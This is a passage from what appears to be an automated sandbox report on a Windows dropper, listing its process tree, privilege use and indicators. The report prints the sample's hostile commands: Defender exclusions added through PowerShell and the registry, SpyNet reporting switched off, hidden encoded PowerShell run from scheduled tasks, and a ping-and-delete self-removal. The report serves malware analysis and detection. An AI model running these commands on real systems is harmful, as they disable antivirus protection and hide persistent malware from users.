0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e buTfUAKLG6Z7VwsHgBNeoZ5x.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3588 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5048 powershell.exe 5048 powershell.exe 3264 urc.0.exe 3264 urc.0.exe 1444 4uvUAteuguw1CkjoosA4Oh3Y.exe 1444 4uvUAteuguw1CkjoosA4Oh3Y.exe 2476 powershell.EXE 2476 powershell.EXE 2476 powershell.EXE 2092 powershell.EXE 2092 powershell.EXE 2092 powershell.EXE 3264 urc.0.exe 3264 urc.0.exe 4072 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4072 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4072 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4072 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4072 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4072 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4072 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4072 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4072 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4072 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4072 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4072 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4072 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4072 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4072 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4072 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4072 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4072 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4072 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4072 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3476 powershell.exe 3476 powershell.exe 3476 powershell.exe 2432 powershell.exe 2432 powershell.exe 2432 powershell.exe 3992 powershell.EXE 3992 powershell.EXE 3992 powershell.EXE 3816 jyVPweM.exe 3816 jyVPweM.exe 3816 jyVPweM.exe 3816 jyVPweM.exe 3816 jyVPweM.exe 3816 jyVPweM.exe 3816 jyVPweM.exe 3816 jyVPweM.exe 3816 jyVPweM.exe 3816 jyVPweM.exe 3816 jyVPweM.exe 3816 jyVPweM.exe 3816 jyVPweM.exe 3816 jyVPweM.exe 3816 jyVPweM.exe 3816 jyVPweM.exe 3816 jyVPweM.exe 3816 jyVPweM.exe 3816 jyVPweM.exe 3816 jyVPweM.exe 3816 jyVPweM.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 668 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2288 8bc50fc624999c1b88ed8b842e195d279fdf33e24458b00d74f026026a09d2ab.exe Token: SeDebugPrivilege 5048 powershell.exe Token: SeDebugPrivilege 2068 CasPol.exe Token: SeDebugPrivilege 2476 powershell.EXE Token: SeDebugPrivilege 2092 powershell.EXE Token: SeDebugPrivilege 4072 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Token: SeDebugPrivilege 3476 powershell.exe Token: SeDebugPrivilege 2432 powershell.exe Token: SeDebugPrivilege 3992 powershell.EXE Token: SeShutdownPrivilege 2940 msiexec.exe Token: SeIncreaseQuotaPrivilege 2940 msiexec.exe Token: SeSecurityPrivilege 4984 msiexec.exe Token: SeCreateTokenPrivilege 2940 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2940 msiexec.exe Token: SeLockMemoryPrivilege 2940 msiexec.exe Token: SeIncreaseQuotaPrivilege 2940 msiexec.exe Token: SeMachineAccountPrivilege 2940 msiexec.exe Token: SeTcbPrivilege 2940 msiexec.exe Token: SeSecurityPrivilege 2940 msiexec.exe Token: SeTakeOwnershipPrivilege 2940 msiexec.exe Token: SeLoadDriverPrivilege 2940 msiexec.exe Token: SeSystemProfilePrivilege 2940 msiexec.exe Token: SeSystemtimePrivilege 2940 msiexec.exe Token: SeProfSingleProcessPrivilege 2940 msiexec.exe Token: SeIncBasePriorityPrivilege 2940 msiexec.exe Token: SeCreatePagefilePrivilege 2940 msiexec.exe Token: SeCreatePermanentPrivilege 2940 msiexec.exe Token: SeBackupPrivilege 2940 msiexec.exe Token: SeRestorePrivilege 2940 msiexec.exe Token: SeShutdownPrivilege 2940 msiexec.exe Token: SeDebugPrivilege 2940 msiexec.exe Token: SeAuditPrivilege 2940 msiexec.exe Token: SeSystemEnvironmentPrivilege 2940 msiexec.exe Token: SeChangeNotifyPrivilege 2940 msiexec.exe Token: SeRemoteShutdownPrivilege 2940 msiexec.exe Token: SeUndockPrivilege 2940 msiexec.exe Token: SeSyncAgentPrivilege 2940 msiexec.exe Token: SeEnableDelegationPrivilege 2940 msiexec.exe Token: SeManageVolumePrivilege 2940 msiexec.exe Token: SeImpersonatePrivilege 2940 msiexec.exe Token: SeCreateGlobalPrivilege 2940 msiexec.exe Token: SeRestorePrivilege 4984 msiexec.exe Token: SeTakeOwnershipPrivilege 4984 msiexec.exe Token: SeRestorePrivilege 4984 msiexec.exe Token: SeTakeOwnershipPrivilege 4984 msiexec.exe Token: SeRestorePrivilege 4984 msiexec.exe Token: SeTakeOwnershipPrivilege 4984 msiexec.exe Token: SeRestorePrivilege 4984 msiexec.exe Token: SeTakeOwnershipPrivilege 4984 msiexec.exe Token: SeRestorePrivilege 4984 msiexec.exe Token: SeTakeOwnershipPrivilege 4984 msiexec.exe Token: SeRestorePrivilege 4984 msiexec.exe Token: SeTakeOwnershipPrivilege 4984 msiexec.exe Token: SeRestorePrivilege 4984 msiexec.exe Token: SeTakeOwnershipPrivilege 4984 msiexec.exe Token: SeRestorePrivilege 4984 msiexec.exe Token: SeTakeOwnershipPrivilege 4984 msiexec.exe Token: SeRestorePrivilege 4984 msiexec.exe Token: SeTakeOwnershipPrivilege 4984 msiexec.exe Token: SeRestorePrivilege 4984 msiexec.exe Token: SeTakeOwnershipPrivilege 4984 msiexec.exe Token: SeRestorePrivilege 4984 msiexec.exe Token: SeTakeOwnershipPrivilege 4984 msiexec.exe Token: SeRestorePrivilege 4984 msiexec.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 1416 urc.1.exe 1416 urc.1.exe 1416 urc.1.exe 1416 urc.1.exe 1416 urc.1.exe 1416 urc.1.exe 1416 urc.1.exe -
Suspicious use of SendNotifyMessage 7 IoCs
pid Process 1416 urc.1.exe 1416 urc.1.exe 1416 urc.1.exe 1416 urc.1.exe 1416 urc.1.exe 1416 urc.1.exe 1416 urc.1.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1624 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2288 wrote to memory of 5048 2288 8bc50fc624999c1b88ed8b842e195d279fdf33e24458b00d74f026026a09d2ab.exe 78 PID 2288 wrote to memory of 5048 2288 8bc50fc624999c1b88ed8b842e195d279fdf33e24458b00d74f026026a09d2ab.exe 78 PID 2288 wrote to memory of 2068 2288 8bc50fc624999c1b88ed8b842e195d279fdf33e24458b00d74f026026a09d2ab.exe 80 PID 2288 wrote to memory of 2068 2288 8bc50fc624999c1b88ed8b842e195d279fdf33e24458b00d74f026026a09d2ab.exe 80 PID 2288 wrote to memory of 2068 2288 8bc50fc624999c1b88ed8b842e195d279fdf33e24458b00d74f026026a09d2ab.exe 80 PID 2288 wrote to memory of 2068 2288 8bc50fc624999c1b88ed8b842e195d279fdf33e24458b00d74f026026a09d2ab.exe 80 PID 2288 wrote to memory of 2068 2288 8bc50fc624999c1b88ed8b842e195d279fdf33e24458b00d74f026026a09d2ab.exe 80 PID 2288 wrote to memory of 2068 2288 8bc50fc624999c1b88ed8b842e195d279fdf33e24458b00d74f026026a09d2ab.exe 80 PID 2288 wrote to memory of 2068 2288 8bc50fc624999c1b88ed8b842e195d279fdf33e24458b00d74f026026a09d2ab.exe 80 PID 2288 wrote to memory of 2068 2288 8bc50fc624999c1b88ed8b842e195d279fdf33e24458b00d74f026026a09d2ab.exe 80 PID 2068 wrote to memory of 984 2068 CasPol.exe 81 PID 2068 wrote to memory of 984 2068 CasPol.exe 81 PID 2068 wrote to memory of 984 2068 CasPol.exe 81 PID 984 wrote to memory of 3264 984 JlrDisb6QpmQ9haRBnx0XPia.exe 82 PID 984 wrote to memory of 3264 984 JlrDisb6QpmQ9haRBnx0XPia.exe 82 PID 984 wrote to memory of 3264 984 JlrDisb6QpmQ9haRBnx0XPia.exe 82 PID 984 wrote to memory of 1416 984 JlrDisb6QpmQ9haRBnx0XPia.exe 85 PID 984 wrote to memory of 1416 984 JlrDisb6QpmQ9haRBnx0XPia.exe 85 PID 984 wrote to memory of 1416 984 JlrDisb6QpmQ9haRBnx0XPia.exe 85 PID 2068 wrote to memory of 4156 2068 CasPol.exe 89 PID 2068 wrote to memory of 4156 2068 CasPol.exe 89 PID 2068 wrote to memory of 4156 2068 CasPol.exe 89 PID 2068 wrote to memory of 1444 2068 CasPol.exe 90 PID 2068 wrote to memory of 1444 2068 CasPol.exe 90 PID 2068 wrote to memory of 3332 2068 CasPol.exe 91 PID 2068 wrote to memory of 3332 2068 CasPol.exe 91 PID 2068 wrote to memory of 3332 2068 CasPol.exe 91 PID 3332 wrote to memory of 1808 3332 buTfUAKLG6Z7VwsHgBNeoZ5x.exe 92 PID 3332 wrote to memory of 1808 3332 buTfUAKLG6Z7VwsHgBNeoZ5x.exe 92 PID 3332 wrote to memory of 1808 3332 buTfUAKLG6Z7VwsHgBNeoZ5x.exe 92 PID 3332 wrote to memory of 3032 3332 buTfUAKLG6Z7VwsHgBNeoZ5x.exe 95 PID 3332 wrote to memory of 3032 3332 buTfUAKLG6Z7VwsHgBNeoZ5x.exe 95 PID 3332 wrote to memory of 3032 3332 buTfUAKLG6Z7VwsHgBNeoZ5x.exe 95 PID 4156 wrote to memory of 2492 4156 fLFBog0wp6NBRBqe0KRLGOMA.exe 94 PID 4156 wrote to memory of 2492 4156 fLFBog0wp6NBRBqe0KRLGOMA.exe 94 PID 4156 wrote to memory of 2492 4156 fLFBog0wp6NBRBqe0KRLGOMA.exe 94 PID 3332 wrote to memory of 784 3332 buTfUAKLG6Z7VwsHgBNeoZ5x.exe 96 PID 3332 wrote to memory of 784 3332 buTfUAKLG6Z7VwsHgBNeoZ5x.exe 96 PID 3332 wrote to memory of 784 3332 buTfUAKLG6Z7VwsHgBNeoZ5x.exe 96 PID 784 wrote to memory of 3828 784 buTfUAKLG6Z7VwsHgBNeoZ5x.exe 97 PID 784 wrote to memory of 3828 784 buTfUAKLG6Z7VwsHgBNeoZ5x.exe 97 PID 784 wrote to memory of 3828 784 buTfUAKLG6Z7VwsHgBNeoZ5x.exe 97 PID 2492 wrote to memory of 2028 2492 Install.exe 101 PID 2492 wrote to memory of 2028 2492 Install.exe 101 PID 2492 wrote to memory of 2028 2492 Install.exe 101 PID 2028 wrote to memory of 716 2028 forfiles.exe 103 PID 2028 wrote to memory of 716 2028 forfiles.exe 103 PID 2028 wrote to memory of 716 2028 forfiles.exe 103 PID 716 wrote to memory of 576 716 cmd.exe 119 PID 716 wrote to memory of 576 716 cmd.exe 119 PID 716 wrote to memory of 576 716 cmd.exe 119 PID 2492 wrote to memory of 2100 2492 Install.exe 105 PID 2492 wrote to memory of 2100 2492 Install.exe 105 PID 2492 wrote to memory of 2100 2492 Install.exe 105 PID 716 wrote to memory of 3872 716 cmd.exe 107 PID 716 wrote to memory of 3872 716 cmd.exe 107 PID 716 wrote to memory of 3872 716 cmd.exe 107 PID 2100 wrote to memory of 2480 2100 forfiles.exe 108 PID 2100 wrote to memory of 2480 2100 forfiles.exe 108 PID 2100 wrote to memory of 2480 2100 forfiles.exe 108 PID 2480 wrote to memory of 1652 2480 cmd.exe 109 PID 2480 wrote to memory of 1652 2480 cmd.exe 109 PID 2480 wrote to memory of 1652 2480 cmd.exe 109 PID 2480 wrote to memory of 4372 2480 cmd.exe 110
Processes
-
C:\Users\Admin\AppData\Local\Temp\8bc50fc624999c1b88ed8b842e195d279fdf33e24458b00d74f026026a09d2ab.exe"C:\Users\Admin\AppData\Local\Temp\8bc50fc624999c1b88ed8b842e195d279fdf33e24458b00d74f026026a09d2ab.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5048
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Users\Admin\Pictures\JlrDisb6QpmQ9haRBnx0XPia.exe"C:\Users\Admin\Pictures\JlrDisb6QpmQ9haRBnx0XPia.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:984 -
C:\Users\Admin\AppData\Local\Temp\urc.0.exe"C:\Users\Admin\AppData\Local\Temp\urc.0.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3264 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\HCBGDGCAAK.exe"5⤵PID:656
-
C:\Users\Admin\AppData\Local\Temp\HCBGDGCAAK.exe"C:\Users\Admin\AppData\Local\Temp\HCBGDGCAAK.exe"6⤵
- Executes dropped EXE
PID:4968 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\HCBGDGCAAK.exe7⤵PID:3080
-
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30008⤵
- Runs ping.exe
PID:3588
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3264 -s 34125⤵
- Program crash
PID:1124
-
-
-
C:\Users\Admin\AppData\Local\Temp\urc.1.exe"C:\Users\Admin\AppData\Local\Temp\urc.1.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1416 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD15⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4072
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 11724⤵
- Program crash
PID:932
-
-
-
C:\Users\Admin\Pictures\fLFBog0wp6NBRBqe0KRLGOMA.exe"C:\Users\Admin\Pictures\fLFBog0wp6NBRBqe0KRLGOMA.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4156 -
C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install.exe.\Install.exe /dEKGWdidYWnQ "385118" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"5⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&6⤵
- Suspicious use of WriteProcessMemory
PID:716 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:327⤵PID:576
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:647⤵PID:3872
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"5⤵
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&6⤵
- Suspicious use of WriteProcessMemory
PID:2480 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:327⤵PID:1652
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:647⤵PID:4372
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gyIvWaLIy" /SC once /ST 03:42:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="5⤵
- Creates scheduled task(s)
PID:1896
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gyIvWaLIy"5⤵PID:2032
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gyIvWaLIy"5⤵PID:4972
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bCAdHbOFiqtMCRhbmR" /SC once /ST 11:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\dnqwiTo.exe\" hl /Uasite_idlfg 385118 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3472
-
-
-
-
C:\Users\Admin\Pictures\4uvUAteuguw1CkjoosA4Oh3Y.exe"C:\Users\Admin\Pictures\4uvUAteuguw1CkjoosA4Oh3Y.exe"3⤵
- Modifies firewall policy service
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1444
-
-
C:\Users\Admin\Pictures\buTfUAKLG6Z7VwsHgBNeoZ5x.exe"C:\Users\Admin\Pictures\buTfUAKLG6Z7VwsHgBNeoZ5x.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:3332 -
C:\Users\Admin\Pictures\buTfUAKLG6Z7VwsHgBNeoZ5x.exeC:\Users\Admin\Pictures\buTfUAKLG6Z7VwsHgBNeoZ5x.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6e6fe1d0,0x6e6fe1dc,0x6e6fe1e84⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1808
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\buTfUAKLG6Z7VwsHgBNeoZ5x.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\buTfUAKLG6Z7VwsHgBNeoZ5x.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3032
-
-
C:\Users\Admin\Pictures\buTfUAKLG6Z7VwsHgBNeoZ5x.exe"C:\Users\Admin\Pictures\buTfUAKLG6Z7VwsHgBNeoZ5x.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3332 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240403110811" --session-guid=14d3e9af-41e2-4e91-a771-932e32cd12c1 --server-tracking-blob=YjBkNTlmMTU5YTA5ZjFlYWVjMGQ4Y2FlOWM0NzVjNmQyNTFjODRmNTFhZjI0NjFjYzRjMjcwOGRiNGQ3MWU3Yjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N18xMjMiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMSIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTIxNDI0ODYuNjgxOCIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2N18xMjMiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJta3QifSwidXVpZCI6IjRmOWU0M2UyLTRlN2QtNDc3My1iNmIwLTE2M2Y2YWIwYzdkNSJ9 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=28040000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Users\Admin\Pictures\buTfUAKLG6Z7VwsHgBNeoZ5x.exeC:\Users\Admin\Pictures\buTfUAKLG6Z7VwsHgBNeoZ5x.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x6dc2e1d0,0x6dc2e1dc,0x6dc2e1e85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3828
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404031108111\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404031108111\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
PID:3172
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404031108111\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404031108111\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2660 -
